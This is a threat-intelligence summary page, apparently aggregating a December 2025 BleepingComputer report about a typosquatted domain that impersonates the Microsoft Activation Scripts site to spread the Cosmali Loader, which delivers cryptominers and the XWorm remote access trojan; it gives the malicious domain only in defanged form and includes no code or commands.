Typosquatted MAS Domain Distributes Cosmali Loader Malware

First reported

24.12.2025 19:44

Last updated

1 unique sources, 1 articles

Summary

Hide ▲

A typosquatted domain impersonating the Microsoft Activation Scripts (MAS) tool has been used to distribute the Cosmali Loader malware via malicious PowerShell scripts. Users mistyping 'get.activated.win' as 'get.activate[.]win' were infected, leading to warnings about the malware on their systems. The malware panel is insecure, exposing infected systems to unauthorized access. The Cosmali Loader delivers cryptomining utilities and the XWorm remote access trojan (RAT). The campaign highlights the risks of typosquatting and the importance of verifying commands before execution.

Timeline

24.12.2025 19:44 1 articles · 23h ago

Typosquatted MAS Domain Distributes Cosmali Loader Malware
A typosquatted domain impersonating the Microsoft Activation Scripts (MAS) tool has been used to distribute the Cosmali Loader malware via malicious PowerShell scripts. Users mistyping 'get.activated.win' as 'get.activate[.]win' were infected, leading to warnings about the malware on their systems. The malware panel is insecure, exposing infected systems to unauthorized access. The Cosmali Loader delivers cryptomining utilities and the XWorm remote access trojan (RAT). The campaign highlights the risks of typosquatting and the importance of verifying commands before execution.
Show sources

Fake MAS Windows activation domain used to spread PowerShell malware — www.bleepingcomputer.com — 24.12.2025 19:44
Open in new tab

Information Snippets

The typosquatted domain 'get.activate[.]win' closely resembles the legitimate MAS domain 'get.activated.win', differing by a single character ('d').
First reported: 24.12.2025 19:44

1 source, 1 article
Show sources
- Fake MAS Windows activation domain used to spread PowerShell malware — www.bleepingcomputer.com — 24.12.2025 19:44
The malware panel for Cosmali Loader is insecure, allowing anyone viewing it to access infected systems.
First reported: 24.12.2025 19:44

1 source, 1 article
Show sources
- Fake MAS Windows activation domain used to spread PowerShell malware — www.bleepingcomputer.com — 24.12.2025 19:44
Cosmali Loader delivers cryptomining utilities and the XWorm remote access trojan (RAT).
First reported: 24.12.2025 19:44

1 source, 1 article
Show sources
- Fake MAS Windows activation domain used to spread PowerShell malware — www.bleepingcomputer.com — 24.12.2025 19:44
The campaign likely originated from a well-intended researcher accessing the malware control panel to inform users of the compromise.
First reported: 24.12.2025 19:44

1 source, 1 article
Show sources
- Fake MAS Windows activation domain used to spread PowerShell malware — www.bleepingcomputer.com — 24.12.2025 19:44
MAS is an open-source tool for activating Microsoft Windows and Office using unauthorized methods, which Microsoft considers a piracy tool.
First reported: 24.12.2025 19:44

1 source, 1 article
Show sources
- Fake MAS Windows activation domain used to spread PowerShell malware — www.bleepingcomputer.com — 24.12.2025 19:44